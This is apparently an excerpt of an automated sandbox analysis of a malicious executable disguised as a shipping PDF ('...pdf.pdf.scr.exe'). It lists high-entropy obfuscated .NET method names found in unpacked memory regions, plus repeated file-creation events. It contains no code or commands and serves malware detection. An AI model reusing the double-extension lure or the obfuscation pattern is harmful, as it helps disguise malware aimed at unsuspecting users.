Source: 0.2.F41355 SO 7670 HBL EXPRESS RELEASEpdf.pdf.scr.exe.3c11a70.3.raw.unpack, fVLhd3v9vj97x0ul7x.cs	High entropy of concatenated method names: 'K3AxlOLVKI', 'VarxJn84gX', 'PJSxpaFyMT', 'C4oxQnAqnI', 'kPTxcx3RIZ', 'KcIx8ir71C', 'al4xg4pRkI', 'ar3xP1CbjZ', 'I97x28B1O4', 'PKCxfWURYJ'
Source: 0.2.F41355 SO 7670 HBL EXPRESS RELEASEpdf.pdf.scr.exe.3c11a70.3.raw.unpack, oCoC4rSRQ5DbVVPrMB.cs	High entropy of concatenated method names: 'u0Jn4DtwQR', 'vd8nEkQTGN', 'F8nnsFxcrI', 'cF9Yu8HPWdNl3mAgAl2', 'mVgTqRH9pFjA5MwAUEJ', 'KtydHfHCsXaAUGQ1Zbo'
Source: 0.2.F41355 SO 7670 HBL EXPRESS RELEASEpdf.pdf.scr.exe.3c11a70.3.raw.unpack, crTyvuEhkkEYNy7pZ3.cs	High entropy of concatenated method names: 'whnA77HBsa', 'dQ7AGfZmg6', 'u8jAMq9Pip', 'ehRABaHdYk', 'qxEALDUgxD', 'oCWAd4r8Gg', 'GfYAo6gujn', 'iEfAvNanha', 'pbEAHHwQC2', 'S0DAh8rQp8'
Source: 0.2.F41355 SO 7670 HBL EXPRESS RELEASEpdf.pdf.scr.exe.3c11a70.3.raw.unpack, a7PBht10ILexMfENh5.cs	High entropy of concatenated method names: 'ty1ooJHs8noJ0FDr7rS', 'gktV4MHAI2JZgw6A5x3', 'RnvnUD2VkT', 'iIIntGEINW', 'Y7inmawLHh', 'jKlQ7UHGxLUlLuSbvOt', 'FrB5qkHBd4kY3hwgQaa', 'VNw4mHHeNyhFl9YILyi'
Source: 0.2.F41355 SO 7670 HBL EXPRESS RELEASEpdf.pdf.scr.exe.3c11a70.3.raw.unpack, nTd64leKOQkBShM71J.cs	High entropy of concatenated method names: 'HCrMnLx7W', 'HEaBLNJUZ', 'nGJd5VT8d', 'XCNoXvuef', 'ShLHn2dgQ', 'jmbhBiaek', 'fat5O0pl1xPh5SRD1F', 'ltuW3029XaQBRHk5PO', 'FxyUnsRso', 'y6PmPcuvN'
Source: 0.2.F41355 SO 7670 HBL EXPRESS RELEASEpdf.pdf.scr.exe.3c11a70.3.raw.unpack, nv80huHyIi5Z0ypRpF.cs	High entropy of concatenated method names: 'G5ibBgK5QF', 'gcXbdVUujo', 'yK7bvwjPme', 'omYbH6Td5n', 'ANZbFOshJO', 'S7lbITtPlX', 'NYnbKN9gW3', 'MfrbU1SAhn', 'aDDbticM2Q', 'YU1bm2unaD'
Source: 0.2.F41355 SO 7670 HBL EXPRESS RELEASEpdf.pdf.scr.exe.3c11a70.3.raw.unpack, GdnMsM2ZpWaqTfDgbs.cs	High entropy of concatenated method names: 'pHwUOVN7Or', 'ErfU1RIwFR', 'qPnUkI1P2i', 'yTgUwTWqam', 'oVEUl5RCci', 'oIKUSwI65i', 'Next', 'Next', 'Next', 'NextBytes'
Source: 0.2.F41355 SO 7670 HBL EXPRESS RELEASEpdf.pdf.scr.exe.3c11a70.3.raw.unpack, cRuI1ZQuA6WoRBZi6G.cs	High entropy of concatenated method names: 'gd7KiR3hi3', 'slpKDMW70S', 'ToString', 'OAQKjAaY9H', 'gcuKx9hB0d', 'yUIKbZXXeI', 'gIjKTq8hE6', 'h2QKnYMHGV', 'NklKA7JSCl', 'dBiKXmNUi1'
Source: 0.2.F41355 SO 7670 HBL EXPRESS RELEASEpdf.pdf.scr.exe.3c11a70.3.raw.unpack, OplsHdzJvA0crPbN5m.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'O9Nt9ADeIG', 'sSUtFjmGmJ', 'jlYtIt1WMT', 'KUOtKERjk2', 'iH8tUuhNHm', 'Or5ttsyaX1', 'QaKtmqbuE3'
Source: 0.2.F41355 SO 7670 HBL EXPRESS RELEASEpdf.pdf.scr.exe.3c11a70.3.raw.unpack, bX9Fp8rNJpntZjUhZX0.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'FAIml1Vvh1', 'J3HmJaeyYt', 'k6MmpqnVku', 'JTomQd9BAT', 'hkKmc6IQqT', 'bANm8Aj7ai', 'wZVmgTfGZt'
Source: 0.2.F41355 SO 7670 HBL EXPRESS RELEASEpdf.pdf.scr.exe.3c11a70.3.raw.unpack, GMDabFXwmBm7Pyr7c7.cs	High entropy of concatenated method names: 'gVbNVtZ62T', 'ObvNjIoYTU', 'RCPNxaUWlK', 'AKuNboDfQc', 'DTpNTbVqOQ', 'Op2NnfLkCn', 'F8WNAjS3ND', 'xulNXYfi3f', 'YAYNu8VUtU', 'uCgNiCRPeY'
Source: 0.2.F41355 SO 7670 HBL EXPRESS RELEASEpdf.pdf.scr.exe.3c11a70.3.raw.unpack, WKYp3LxaO9xCgRuSVE.cs	High entropy of concatenated method names: 'Dispose', 'QUCr2EEIRR', 'l6Xe1mZtub', 'MmtOONhLeV', 'vcArfml14L', 'UcJrzgRJ0t', 'ProcessDialogKey', 'LSOeydnMsM', 'vpWeraqTfD', 'WbseekRito'
Source: 0.2.F41355 SO 7670 HBL EXPRESS RELEASEpdf.pdf.scr.exe.3c11a70.3.raw.unpack, qhYTVHqPF5FU4j8DXE.cs	High entropy of concatenated method names: 'aE79vAZDC2', 'GjS9HF8Wnh', 'gOs9OPlSXR', 'B4Q91gg9mK', 'sFG9wOKrdq', 'hhZ9SwuKqN', 'OIX94xU5UB', 'hoD9Yy4UJe', 'W1F93UZ2o8', 'cft90dsjhg'
Source: 0.2.F41355 SO 7670 HBL EXPRESS RELEASEpdf.pdf.scr.exe.3c11a70.3.raw.unpack, gbbVA14tBQCOnqKU9Y.cs	High entropy of concatenated method names: 'DUfAjERvfC', 'IErAbUc97J', 'JZ6AnQkN2F', 'J4UnfcEXMV', 'rPJnzOK7Hv', 'CCJAyBULpZ', 'TfpArh6bBv', 'QRIAe6iWt2', 'zwgAN4uRWD', 'AB4AR7xLgg'
Source: 0.2.F41355 SO 7670 HBL EXPRESS RELEASEpdf.pdf.scr.exe.3c11a70.3.raw.unpack, UAml14PLccJgRJ0t4S.cs	High entropy of concatenated method names: 'UwgUj4PTKm', 'lG1UxpBtKI', 'BB7UbmhkXR', 'nF8UTuAioQ', 's3xUn9Z96C', 'i9TUAlGsae', 'IhsUX9TMZW', 'lrLUud4Zkw', 'CQuUiV7JRT', 'cfDUDmKxpR'
Source: 0.2.F41355 SO 7670 HBL EXPRESS RELEASEpdf.pdf.scr.exe.3c11a70.3.raw.unpack, tAcbefryMggPVwpTLx7.cs	High entropy of concatenated method names: 'OiQt77QEWV', 'IqAtG9rvsK', 'ctCtM0VyVp', 'wA1tBYOj2s', 'y1mtL1nKmK', 'WlGtdJlRdr', 'JemtoeZPJu', 'tAdtvh0fNI', 'rU9tHRIjXg', 'UTFtht5mEC'
Source: 0.2.F41355 SO 7670 HBL EXPRESS RELEASEpdf.pdf.scr.exe.3c11a70.3.raw.unpack, HRito2ftyhW443Hxbl.cs	High entropy of concatenated method names: 'Ldmtr7evZA', 'm7ktN1QBMx', 'NZmtRQTQP1', 'uoCtja763x', 'VHitxoBVFL', 'ITdtTdvI5L', 'A3GtncT0to', 'QKqUgQi5yM', 'PFxUPkSYGo', 'LCoU2djfgO'
Source: 0.2.F41355 SO 7670 HBL EXPRESS RELEASEpdf.pdf.scr.exe.3c11a70.3.raw.unpack, uNjnQspJ64xXuolXpg.cs	High entropy of concatenated method names: 'ToString', 'vOuI0AF8bg', 'PSyI1UJcNe', 'g7lIkURrQX', 'PgGIw5YwKO', 'mFYISaX6qq', 'HQ2Isj14Py', 'RpXI4noFHd', 'TL8IYeTBqn', 'swiIENsWLM'
Source: 0.2.F41355 SO 7670 HBL EXPRESS RELEASEpdf.pdf.scr.exe.3c11a70.3.raw.unpack, jl3RAe88u4hlLD3Mj7.cs	High entropy of concatenated method names: 'PtPKPqDyfD', 'CPfKf7clCW', 'OeIUyyUOCt', 'Du3UrGmGIc', 'lH5K0wMsgX', 'hj7KCPBvKK', 'kbgKq2OpiJ', 'NEPKlG09aV', 'jf7KJ0Kpai', 'oeQKpu18pQ'
Source: 0.2.F41355 SO 7670 HBL EXPRESS RELEASEpdf.pdf.scr.exe.3c11a70.3.raw.unpack, pLg0YmhpR8uYAIHdvu.cs	High entropy of concatenated method names: 'vlZTLOP36D', 'kGmTo9YIU3', 'JrhbkND3gA', 'w8WbwZhdjh', 'AAkbSjOGWH', 'zWRbstnUfc', 'Qk1b4i2xs1', 'BxBbYXbYYI', 'EMQbEorGHy', 'bc9b3UUQ5K'
Source: 0.2.F41355 SO 7670 HBL EXPRESS RELEASEpdf.pdf.scr.exe.3c11a70.3.raw.unpack, V20jGCR5LKTDtuJD4U.cs	High entropy of concatenated method names: 'hwjrAVLhd3', 'ovjrX97x0u', 'lyIrii5Z0y', 'SRprDFILg0', 'pHdrFvuk41', 'NRprIkb9Be', 'SR9HnvbuAZJjDGALZh', 'JWWe3i6aDapwC80w9r', 'RcorrsiSy6', 'eMOrNVbTjy'
Source: 0.2.F41355 SO 7670 HBL EXPRESS RELEASEpdf.pdf.scr.exe.3c11a70.3.raw.unpack, H413RpOkb9Beefy6KO.cs	High entropy of concatenated method names: 'GIpnVXkXDv', 'NNunx1tWZS', 'sobnT7Wuqg', 'M3NnAgysns', 'dsdnXCdgVC', 'u8wTc2RkIw', 'YLWT8JPkNa', 'kG4Tghf4cn', 'foRTP63LKh', 'NTWT23UpQZ'
Source: 0.2.F41355 SO 7670 HBL EXPRESS RELEASEpdf.pdf.scr.exe.3c11a70.3.raw.unpack, KvQxCNlNtBHxoGnWPu.cs	High entropy of concatenated method names: 'TxJF3EEgX5', 'tfmFCVDIi2', 'vCCFlRoqvO', 'FMZFJWha18', 'BwZF17Awnt', 'gLFFkQK5wk', 'O6ZFwJW45Q', 'b3HFSX02Ew', 'GlAFsXEIGR', 'v8KF4NRq2r'
Source: 0.2.F41355 SO 7670 HBL EXPRESS RELEASEpdf.pdf.scr.exe.2a5cb48.0.raw.unpack, OEGyOZzp9CU9Z.cs	High entropy of concatenated method names: 'QYSru9RU5dJWd', 'oi9Msqd9lmqFp', 'Gh7hF3Ceyz4jK', 'x2Kcz0n4msm1l2xM', '_4hDI5T8H5DCOIm19', 'T6aFt50BZla82ZA2', 'zpcOiMJTAlF4Htxi', 'TMFXXcHHzUU18I1r', 'ZSkwZRotVkMfXhhu', 'Um2YTXt47I4LIxgc'
Source: 0.2.F41355 SO 7670 HBL EXPRESS RELEASEpdf.pdf.scr.exe.2a5cb48.0.raw.unpack, v5gt0V01k1MSsC0vwoxxBSwsEW4T1eqJw046P2ak3r4M2UHQ1RfEfyXqwlgDqRqjrSOTYe7.cs	High entropy of concatenated method names: 'Equals', 'GetHashCode', 'GetType', 'ToString', 'Create__Instance__', 'Dispose__Instance__', 'QTea7y2A8yGbO3jMXxuYC9YMcx5anBR', 'ZTIL5yWBKqapf9Byr2X2ov4nJgGIqjf', 'WHkIaWdsBqOvjqgK5gnz3Hq7FGRo7av', 'ksvOYOxtyeEJgsYuEk2j6FJUFQEL7jb'
Source: 0.2.F41355 SO 7670 HBL EXPRESS RELEASEpdf.pdf.scr.exe.2a5cb48.0.raw.unpack, xEwUvc4BlwXCJ.cs	High entropy of concatenated method names: 'upuCmD95kpAQn', 'y64QqzLLzgvYy', 'nHNLF6ETZc4pz', 'wFe23vyXZnI9p', 'oPyUSoKLxc3MJ', 'j0yacKOMxpzCw3ZgwzP7SYa9OQxk42U', 'sG0Gu7E9uPceY4JkCHFeLM6rppnIbSk', 'Ic69UCn21qS8jQPeUpzcxe67X8Wwo7C', 'TVdrYhGtHgnmKaKEGnnQHc1AVeCLwz9', 'h9lFeGqDok6PiuQlRtN7JIQA7sN9FeZ'
Source: 0.2.F41355 SO 7670 HBL EXPRESS RELEASEpdf.pdf.scr.exe.2a5cb48.0.raw.unpack, qMGvLJvouSdkL.cs	High entropy of concatenated method names: 'wAkM01TBZTMeC', 'ciAT4tkkLZ8RM', 'kyv1OiOaRjUOS', 'Is1Vu2C8gzfuWAcZ', 'ZrXVwJq1NPBYst66', 'YSiZ9OqRAn5DEoap', 'kpqsU8I4EmsXem6T', 'Y40LWH71GiExNonP', 'wlqe8L0mqhORb3Xh', 'cBzGfHA7YZurGUjI'
Source: 0.2.F41355 SO 7670 HBL EXPRESS RELEASEpdf.pdf.scr.exe.2a5cb48.0.raw.unpack, 3QiiXqkghrMk1.cs	High entropy of concatenated method names: '_7TDRTDNWODVx9', 'bjpklCnAU25Ps', '_7whWzOffgktu7', 'H6OjpWJSuZpR7', 'LgXlVehbtF6PL', 'VPnNUxfUUOfKi', 'kVcqKyJkqeEYF', 'I9f9xqzndWbJy', 'Yh4ih3UMSubwZ', '_99oZuJy83I8YX'
Source: 0.2.F41355 SO 7670 HBL EXPRESS RELEASEpdf.pdf.scr.exe.2a5cb48.0.raw.unpack, y42W1bnvO6P0K.cs	High entropy of concatenated method names: 'LG61tF1NXxMw5', 'oGvBieVy94qbk', 'YRTDDNA0tkzMF', 'VhxySITiopS46', 'qjbfovDtQWz1b', 'kLPAgXYZstRMB', 'hjXpfk41rTAw1', 'zs2SZYN7C9FhZ', 'zFQIATYwwABMt', 'qai42JONF5klU'
Source: 0.2.F41355 SO 7670 HBL EXPRESS RELEASEpdf.pdf.scr.exe.2a5cb48.0.raw.unpack, 4QBfyOitSe4w0.cs	High entropy of concatenated method names: 'wcUZ2mvylwf7l', 'WtIrNy0hVmv60', 'JJgHyUlgPqlHQ', 'oHuREPEY4JElU', '_6vBzT4Nf8lYoy', 'Pai19egUGSisn', 'R5KRLNkgechqT', 'BCrPs0JGWRM5b', 'aoGqSGI44Uvct', 'irOTow0Wq5kJo'
Source: 0.2.F41355 SO 7670 HBL EXPRESS RELEASEpdf.pdf.scr.exe.2a5cb48.0.raw.unpack, yI26puFLQ4OeW.cs	High entropy of concatenated method names: 'RPwrCFQWFVe3z', 'ykPv5m8mGukHt', 'rl3v1HQ21t3Ss', 'p5lTD1bRQsSns', 'N73EDMwGLrsYV', '_7giKgaxCmtum3', 'zR4TMA5bTqEsF', 'lNVI49QJGetLk', 'ivrYT9hUulqbg', 'G1GjbMsl7I84P'
Source: 0.2.F41355 SO 7670 HBL EXPRESS RELEASEpdf.pdf.scr.exe.2ab9c80.2.raw.unpack, OEGyOZzp9CU9Z.cs	High entropy of concatenated method names: 'QYSru9RU5dJWd', 'oi9Msqd9lmqFp', 'Gh7hF3Ceyz4jK', 'x2Kcz0n4msm1l2xM', '_4hDI5T8H5DCOIm19', 'T6aFt50BZla82ZA2', 'zpcOiMJTAlF4Htxi', 'TMFXXcHHzUU18I1r', 'ZSkwZRotVkMfXhhu', 'Um2YTXt47I4LIxgc'
Source: 0.2.F41355 SO 7670 HBL EXPRESS RELEASEpdf.pdf.scr.exe.2ab9c80.2.raw.unpack, v5gt0V01k1MSsC0vwoxxBSwsEW4T1eqJw046P2ak3r4M2UHQ1RfEfyXqwlgDqRqjrSOTYe7.cs	High entropy of concatenated method names: 'Equals', 'GetHashCode', 'GetType', 'ToString', 'Create__Instance__', 'Dispose__Instance__', 'QTea7y2A8yGbO3jMXxuYC9YMcx5anBR', 'ZTIL5yWBKqapf9Byr2X2ov4nJgGIqjf', 'WHkIaWdsBqOvjqgK5gnz3Hq7FGRo7av', 'ksvOYOxtyeEJgsYuEk2j6FJUFQEL7jb'
Source: 0.2.F41355 SO 7670 HBL EXPRESS RELEASEpdf.pdf.scr.exe.2ab9c80.2.raw.unpack, xEwUvc4BlwXCJ.cs	High entropy of concatenated method names: 'upuCmD95kpAQn', 'y64QqzLLzgvYy', 'nHNLF6ETZc4pz', 'wFe23vyXZnI9p', 'oPyUSoKLxc3MJ', 'j0yacKOMxpzCw3ZgwzP7SYa9OQxk42U', 'sG0Gu7E9uPceY4JkCHFeLM6rppnIbSk', 'Ic69UCn21qS8jQPeUpzcxe67X8Wwo7C', 'TVdrYhGtHgnmKaKEGnnQHc1AVeCLwz9', 'h9lFeGqDok6PiuQlRtN7JIQA7sN9FeZ'
Source: 0.2.F41355 SO 7670 HBL EXPRESS RELEASEpdf.pdf.scr.exe.2ab9c80.2.raw.unpack, qMGvLJvouSdkL.cs	High entropy of concatenated method names: 'wAkM01TBZTMeC', 'ciAT4tkkLZ8RM', 'kyv1OiOaRjUOS', 'Is1Vu2C8gzfuWAcZ', 'ZrXVwJq1NPBYst66', 'YSiZ9OqRAn5DEoap', 'kpqsU8I4EmsXem6T', 'Y40LWH71GiExNonP', 'wlqe8L0mqhORb3Xh', 'cBzGfHA7YZurGUjI'
Source: 0.2.F41355 SO 7670 HBL EXPRESS RELEASEpdf.pdf.scr.exe.2ab9c80.2.raw.unpack, 3QiiXqkghrMk1.cs	High entropy of concatenated method names: '_7TDRTDNWODVx9', 'bjpklCnAU25Ps', '_7whWzOffgktu7', 'H6OjpWJSuZpR7', 'LgXlVehbtF6PL', 'VPnNUxfUUOfKi', 'kVcqKyJkqeEYF', 'I9f9xqzndWbJy', 'Yh4ih3UMSubwZ', '_99oZuJy83I8YX'
Source: 0.2.F41355 SO 7670 HBL EXPRESS RELEASEpdf.pdf.scr.exe.2ab9c80.2.raw.unpack, y42W1bnvO6P0K.cs	High entropy of concatenated method names: 'LG61tF1NXxMw5', 'oGvBieVy94qbk', 'YRTDDNA0tkzMF', 'VhxySITiopS46', 'qjbfovDtQWz1b', 'kLPAgXYZstRMB', 'hjXpfk41rTAw1', 'zs2SZYN7C9FhZ', 'zFQIATYwwABMt', 'qai42JONF5klU'
Source: 0.2.F41355 SO 7670 HBL EXPRESS RELEASEpdf.pdf.scr.exe.2ab9c80.2.raw.unpack, 4QBfyOitSe4w0.cs	High entropy of concatenated method names: 'wcUZ2mvylwf7l', 'WtIrNy0hVmv60', 'JJgHyUlgPqlHQ', 'oHuREPEY4JElU', '_6vBzT4Nf8lYoy', 'Pai19egUGSisn', 'R5KRLNkgechqT', 'BCrPs0JGWRM5b', 'aoGqSGI44Uvct', 'irOTow0Wq5kJo'
Source: 0.2.F41355 SO 7670 HBL EXPRESS RELEASEpdf.pdf.scr.exe.2ab9c80.2.raw.unpack, yI26puFLQ4OeW.cs	High entropy of concatenated method names: 'RPwrCFQWFVe3z', 'ykPv5m8mGukHt', 'rl3v1HQ21t3Ss', 'p5lTD1bRQsSns', 'N73EDMwGLrsYV', '_7giKgaxCmtum3', 'zR4TMA5bTqEsF', 'lNVI49QJGetLk', 'ivrYT9hUulqbg', 'G1GjbMsl7I84P'
Source: 0.2.F41355 SO 7670 HBL EXPRESS RELEASEpdf.pdf.scr.exe.6d80000.6.raw.unpack, fVLhd3v9vj97x0ul7x.cs	High entropy of concatenated method names: 'K3AxlOLVKI', 'VarxJn84gX', 'PJSxpaFyMT', 'C4oxQnAqnI', 'kPTxcx3RIZ', 'KcIx8ir71C', 'al4xg4pRkI', 'ar3xP1CbjZ', 'I97x28B1O4', 'PKCxfWURYJ'
Source: 0.2.F41355 SO 7670 HBL EXPRESS RELEASEpdf.pdf.scr.exe.6d80000.6.raw.unpack, oCoC4rSRQ5DbVVPrMB.cs	High entropy of concatenated method names: 'u0Jn4DtwQR', 'vd8nEkQTGN', 'F8nnsFxcrI', 'cF9Yu8HPWdNl3mAgAl2', 'mVgTqRH9pFjA5MwAUEJ', 'KtydHfHCsXaAUGQ1Zbo'
Source: 0.2.F41355 SO 7670 HBL EXPRESS RELEASEpdf.pdf.scr.exe.6d80000.6.raw.unpack, crTyvuEhkkEYNy7pZ3.cs	High entropy of concatenated method names: 'whnA77HBsa', 'dQ7AGfZmg6', 'u8jAMq9Pip', 'ehRABaHdYk', 'qxEALDUgxD', 'oCWAd4r8Gg', 'GfYAo6gujn', 'iEfAvNanha', 'pbEAHHwQC2', 'S0DAh8rQp8'
Source: 0.2.F41355 SO 7670 HBL EXPRESS RELEASEpdf.pdf.scr.exe.6d80000.6.raw.unpack, a7PBht10ILexMfENh5.cs	High entropy of concatenated method names: 'ty1ooJHs8noJ0FDr7rS', 'gktV4MHAI2JZgw6A5x3', 'RnvnUD2VkT', 'iIIntGEINW', 'Y7inmawLHh', 'jKlQ7UHGxLUlLuSbvOt', 'FrB5qkHBd4kY3hwgQaa', 'VNw4mHHeNyhFl9YILyi'
Source: 0.2.F41355 SO 7670 HBL EXPRESS RELEASEpdf.pdf.scr.exe.6d80000.6.raw.unpack, nTd64leKOQkBShM71J.cs	High entropy of concatenated method names: 'HCrMnLx7W', 'HEaBLNJUZ', 'nGJd5VT8d', 'XCNoXvuef', 'ShLHn2dgQ', 'jmbhBiaek', 'fat5O0pl1xPh5SRD1F', 'ltuW3029XaQBRHk5PO', 'FxyUnsRso', 'y6PmPcuvN'
Source: 0.2.F41355 SO 7670 HBL EXPRESS RELEASEpdf.pdf.scr.exe.6d80000.6.raw.unpack, nv80huHyIi5Z0ypRpF.cs	High entropy of concatenated method names: 'G5ibBgK5QF', 'gcXbdVUujo', 'yK7bvwjPme', 'omYbH6Td5n', 'ANZbFOshJO', 'S7lbITtPlX', 'NYnbKN9gW3', 'MfrbU1SAhn', 'aDDbticM2Q', 'YU1bm2unaD'
Source: 0.2.F41355 SO 7670 HBL EXPRESS RELEASEpdf.pdf.scr.exe.6d80000.6.raw.unpack, GdnMsM2ZpWaqTfDgbs.cs	High entropy of concatenated method names: 'pHwUOVN7Or', 'ErfU1RIwFR', 'qPnUkI1P2i', 'yTgUwTWqam', 'oVEUl5RCci', 'oIKUSwI65i', 'Next', 'Next', 'Next', 'NextBytes'
Source: 0.2.F41355 SO 7670 HBL EXPRESS RELEASEpdf.pdf.scr.exe.6d80000.6.raw.unpack, cRuI1ZQuA6WoRBZi6G.cs	High entropy of concatenated method names: 'gd7KiR3hi3', 'slpKDMW70S', 'ToString', 'OAQKjAaY9H', 'gcuKx9hB0d', 'yUIKbZXXeI', 'gIjKTq8hE6', 'h2QKnYMHGV', 'NklKA7JSCl', 'dBiKXmNUi1'
Source: 0.2.F41355 SO 7670 HBL EXPRESS RELEASEpdf.pdf.scr.exe.6d80000.6.raw.unpack, OplsHdzJvA0crPbN5m.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'O9Nt9ADeIG', 'sSUtFjmGmJ', 'jlYtIt1WMT', 'KUOtKERjk2', 'iH8tUuhNHm', 'Or5ttsyaX1', 'QaKtmqbuE3'
Source: 0.2.F41355 SO 7670 HBL EXPRESS RELEASEpdf.pdf.scr.exe.6d80000.6.raw.unpack, bX9Fp8rNJpntZjUhZX0.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'FAIml1Vvh1', 'J3HmJaeyYt', 'k6MmpqnVku', 'JTomQd9BAT', 'hkKmc6IQqT', 'bANm8Aj7ai', 'wZVmgTfGZt'
Source: 0.2.F41355 SO 7670 HBL EXPRESS RELEASEpdf.pdf.scr.exe.6d80000.6.raw.unpack, GMDabFXwmBm7Pyr7c7.cs	High entropy of concatenated method names: 'gVbNVtZ62T', 'ObvNjIoYTU', 'RCPNxaUWlK', 'AKuNboDfQc', 'DTpNTbVqOQ', 'Op2NnfLkCn', 'F8WNAjS3ND', 'xulNXYfi3f', 'YAYNu8VUtU', 'uCgNiCRPeY'
Source: 0.2.F41355 SO 7670 HBL EXPRESS RELEASEpdf.pdf.scr.exe.6d80000.6.raw.unpack, WKYp3LxaO9xCgRuSVE.cs	High entropy of concatenated method names: 'Dispose', 'QUCr2EEIRR', 'l6Xe1mZtub', 'MmtOONhLeV', 'vcArfml14L', 'UcJrzgRJ0t', 'ProcessDialogKey', 'LSOeydnMsM', 'vpWeraqTfD', 'WbseekRito'
Source: 0.2.F41355 SO 7670 HBL EXPRESS RELEASEpdf.pdf.scr.exe.6d80000.6.raw.unpack, qhYTVHqPF5FU4j8DXE.cs	High entropy of concatenated method names: 'aE79vAZDC2', 'GjS9HF8Wnh', 'gOs9OPlSXR', 'B4Q91gg9mK', 'sFG9wOKrdq', 'hhZ9SwuKqN', 'OIX94xU5UB', 'hoD9Yy4UJe', 'W1F93UZ2o8', 'cft90dsjhg'
Source: 0.2.F41355 SO 7670 HBL EXPRESS RELEASEpdf.pdf.scr.exe.6d80000.6.raw.unpack, gbbVA14tBQCOnqKU9Y.cs	High entropy of concatenated method names: 'DUfAjERvfC', 'IErAbUc97J', 'JZ6AnQkN2F', 'J4UnfcEXMV', 'rPJnzOK7Hv', 'CCJAyBULpZ', 'TfpArh6bBv', 'QRIAe6iWt2', 'zwgAN4uRWD', 'AB4AR7xLgg'
Source: 0.2.F41355 SO 7670 HBL EXPRESS RELEASEpdf.pdf.scr.exe.6d80000.6.raw.unpack, UAml14PLccJgRJ0t4S.cs	High entropy of concatenated method names: 'UwgUj4PTKm', 'lG1UxpBtKI', 'BB7UbmhkXR', 'nF8UTuAioQ', 's3xUn9Z96C', 'i9TUAlGsae', 'IhsUX9TMZW', 'lrLUud4Zkw', 'CQuUiV7JRT', 'cfDUDmKxpR'
Source: 0.2.F41355 SO 7670 HBL EXPRESS RELEASEpdf.pdf.scr.exe.6d80000.6.raw.unpack, tAcbefryMggPVwpTLx7.cs	High entropy of concatenated method names: 'OiQt77QEWV', 'IqAtG9rvsK', 'ctCtM0VyVp', 'wA1tBYOj2s', 'y1mtL1nKmK', 'WlGtdJlRdr', 'JemtoeZPJu', 'tAdtvh0fNI', 'rU9tHRIjXg', 'UTFtht5mEC'
Source: 0.2.F41355 SO 7670 HBL EXPRESS RELEASEpdf.pdf.scr.exe.6d80000.6.raw.unpack, HRito2ftyhW443Hxbl.cs	High entropy of concatenated method names: 'Ldmtr7evZA', 'm7ktN1QBMx', 'NZmtRQTQP1', 'uoCtja763x', 'VHitxoBVFL', 'ITdtTdvI5L', 'A3GtncT0to', 'QKqUgQi5yM', 'PFxUPkSYGo', 'LCoU2djfgO'
Source: 0.2.F41355 SO 7670 HBL EXPRESS RELEASEpdf.pdf.scr.exe.6d80000.6.raw.unpack, uNjnQspJ64xXuolXpg.cs	High entropy of concatenated method names: 'ToString', 'vOuI0AF8bg', 'PSyI1UJcNe', 'g7lIkURrQX', 'PgGIw5YwKO', 'mFYISaX6qq', 'HQ2Isj14Py', 'RpXI4noFHd', 'TL8IYeTBqn', 'swiIENsWLM'
Source: 0.2.F41355 SO 7670 HBL EXPRESS RELEASEpdf.pdf.scr.exe.6d80000.6.raw.unpack, jl3RAe88u4hlLD3Mj7.cs	High entropy of concatenated method names: 'PtPKPqDyfD', 'CPfKf7clCW', 'OeIUyyUOCt', 'Du3UrGmGIc', 'lH5K0wMsgX', 'hj7KCPBvKK', 'kbgKq2OpiJ', 'NEPKlG09aV', 'jf7KJ0Kpai', 'oeQKpu18pQ'
Source: 0.2.F41355 SO 7670 HBL EXPRESS RELEASEpdf.pdf.scr.exe.6d80000.6.raw.unpack, pLg0YmhpR8uYAIHdvu.cs	High entropy of concatenated method names: 'vlZTLOP36D', 'kGmTo9YIU3', 'JrhbkND3gA', 'w8WbwZhdjh', 'AAkbSjOGWH', 'zWRbstnUfc', 'Qk1b4i2xs1', 'BxBbYXbYYI', 'EMQbEorGHy', 'bc9b3UUQ5K'
Source: 0.2.F41355 SO 7670 HBL EXPRESS RELEASEpdf.pdf.scr.exe.6d80000.6.raw.unpack, V20jGCR5LKTDtuJD4U.cs	High entropy of concatenated method names: 'hwjrAVLhd3', 'ovjrX97x0u', 'lyIrii5Z0y', 'SRprDFILg0', 'pHdrFvuk41', 'NRprIkb9Be', 'SR9HnvbuAZJjDGALZh', 'JWWe3i6aDapwC80w9r', 'RcorrsiSy6', 'eMOrNVbTjy'
Source: 0.2.F41355 SO 7670 HBL EXPRESS RELEASEpdf.pdf.scr.exe.6d80000.6.raw.unpack, H413RpOkb9Beefy6KO.cs	High entropy of concatenated method names: 'GIpnVXkXDv', 'NNunx1tWZS', 'sobnT7Wuqg', 'M3NnAgysns', 'dsdnXCdgVC', 'u8wTc2RkIw', 'YLWT8JPkNa', 'kG4Tghf4cn', 'foRTP63LKh', 'NTWT23UpQZ'
Source: 0.2.F41355 SO 7670 HBL EXPRESS RELEASEpdf.pdf.scr.exe.6d80000.6.raw.unpack, KvQxCNlNtBHxoGnWPu.cs	High entropy of concatenated method names: 'TxJF3EEgX5', 'tfmFCVDIi2', 'vCCFlRoqvO', 'FMZFJWha18', 'BwZF17Awnt', 'gLFFkQK5wk', 'O6ZFwJW45Q', 'b3HFSX02Ew', 'GlAFsXEIGR', 'v8KF4NRq2r'

Source: C:\Users\user\Desktop\F41355 SO 7670 HBL EXPRESS RELEASEpdf.pdf.scr.exe	File created: \f41355 so 7670 hbl express releasepdf.pdf.scr.exe
Source: C:\Users\user\Desktop\F41355 SO 7670 HBL EXPRESS RELEASEpdf.pdf.scr.exe	File created: \f41355 so 7670 hbl express releasepdf.pdf.scr.exe
Source: C:\Users\user\Desktop\F41355 SO 7670 HBL EXPRESS RELEASEpdf.pdf.scr.exe	File created: \f41355 so 7670 hbl express releasepdf.pdf.scr.exe
Source: C:\Users\user\Desktop\F41355 SO 7670 HBL EXPRESS RELEASEpdf.pdf.scr.exe	File created: \f41355 so 7670 hbl express releasepdf.pdf.scr.exe
Source: C:\Users\user\Desktop\F41355 SO 7670 HBL EXPRESS RELEASEpdf.pdf.scr.exe	File created: \f41355 so 7670 hbl express releasepdf.pdf.scr.exe
Source: C:\Users\user\Desktop\F41355 SO 7670 HBL EXPRESS RELEASEpdf.pdf.scr.exe	File created: \f41355 so 7670 hbl express releasepdf.pdf.scr.exe	Jump to behavior
